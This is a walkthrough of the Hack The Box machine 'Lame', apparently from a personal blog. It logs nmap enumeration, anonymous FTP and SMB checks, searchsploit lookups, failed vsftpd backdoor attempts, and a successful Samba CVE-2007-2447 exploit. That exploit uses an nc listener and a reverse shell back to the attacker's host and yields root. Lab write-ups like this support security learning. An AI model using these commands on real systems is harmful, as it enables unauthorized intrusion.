Title here
Summary here
Lame
Details:
- OS: Linux
- RELEASE DATE: 14 Mar 2017
- DIFFICULTY: Easy
Enumeration:
export RHOST=10.129.229.88
export LHOST=10.10.14.113> nmap -sS -sV -sC -p- -oN Lame $RHOST
...
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-07 13:24 BST
Nmap scan report for 10.129.232.239
Host is up (0.0087s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.113
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 600fcfe1c05f6a74d69024fac4d56ccd (DSA)
|_ 2048 5656240f211ddea72bae61b1243de8f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2024-06-07T08:27:48-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 2h00m38s, deviation: 2h49m45s, median: 36s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 192.27 secondsExploitation:
test anonymous smb login
> ncftp -u anonymous $RHOST
...
Connecting to 10.129.232.239...
(vsFTPd 2.3.4)
Logging in...
Login successful.
Logged in to 10.129.232.239.
ncftp / >
# check dir
ncftp / > ls -lha
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..nothing to see…
lists public shares on that server
> smbclient -L $RHOST -U%
...
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP LAMEget share details
> smbmap -H $RHOST
...
[+] IP: 10.129.232.239:445 Name: hackthebox.gr
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))test anonymous smb login again but this time directly to /tmp where we have rw permissions
> smbclient -N //$RHOST/tmp
...
Anonymous login successful
smb: \> ls
...
. D 0 Fri Jun 7 14:18:44 2024
.. DR 0 Sat Oct 31 06:33:58 2020
.ICE-unix DH 0 Fri Jun 7 13:20:42 2024
vmware-root DR 0 Fri Jun 7 13:20:51 2024
.X11-unix DH 0 Fri Jun 7 13:21:09 2024
.X0-lock HR 11 Fri Jun 7 13:21:09 2024
5657.jsvc_up R 0 Fri Jun 7 13:21:54 2024
vgauthsvclog.txt.0 R 1600 Fri Jun 7 13:20:41 2024
7282168 blocks of size 1024. 5385892 blocks availablenothing to see…
Get CVE details from the rest of our services:
> searchsploit vsFTPd 2.3.4
...
--------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
--------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results> searchsploit OpenSSH 4.7p1
...
--------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------- ---------------------------------
OpenSSH 2.3 < 7.7 - Username Enumeration | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) | linux/remote/45210.py
OpenSSH < 6.6 SFTP (x64) - Command Execution | linux_x86-64/remote/45000.c
OpenSSH < 6.6 SFTP - Command Execution | linux/remote/45001.py
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Es | linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading | linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py
--------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results> searchsploit samba 3.0.20
--------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py
--------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Resultstesting manual exploit
# load module
> searchsploit -m unix/remote/49757.py
...
Exploit: vsftpd 2.3.4 - Backdoor Command Execution
URL: https://www.exploit-db.com/exploits/49757
Path: /usr/share/exploitdb/exploits/unix/remote/49757.py
Codes: CVE-2011-2523
Verified: True
File Type: Python script, ASCII text executable
Copied to: /root/49757.py
# run script
> python /root/49757.py $RHOST
...
# ...get stucked
^C [+]Exiting...switch to metasploit
# search for module
[msf](Jobs:0 Agents:0) >> search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
# load module
[msf](Jobs:0 Agents:0) >> use exploit/unix/ftp/vsftpd_234_backdoor
# print options
[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> options
# set rhost
[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> set rhost <ip_address>
# set payload
[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> set payload cmd/unix/interact
# run payload
[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> run
...
[*] 10.129.232.239:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.129.232.239:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.does not look so good
Lets try the command injection vulnerability CVE-2007-2447 by using amriunix/CVE-2007-2447
# clone repo
> git clone https://github.com/amriunix/CVE-2007-2447
# met dependencies
> pip3 install --user pysmb
# run netcat on a diffrent terminal
> nc -lnvp 5555
...
Ncat: Listening on 0.0.0.0:5555
# run script
> python3 ./CVE-2007-2447/usermap_script.py $RHOST 139 $LHOST 5555
# on netcat you will see
Ncat: Connection from 10.129.232.239.
# in netcat check
> whoami
...
root #(!)Conclusion:
simple in retrospect, as always
Prev
LinksNext
CozyHosting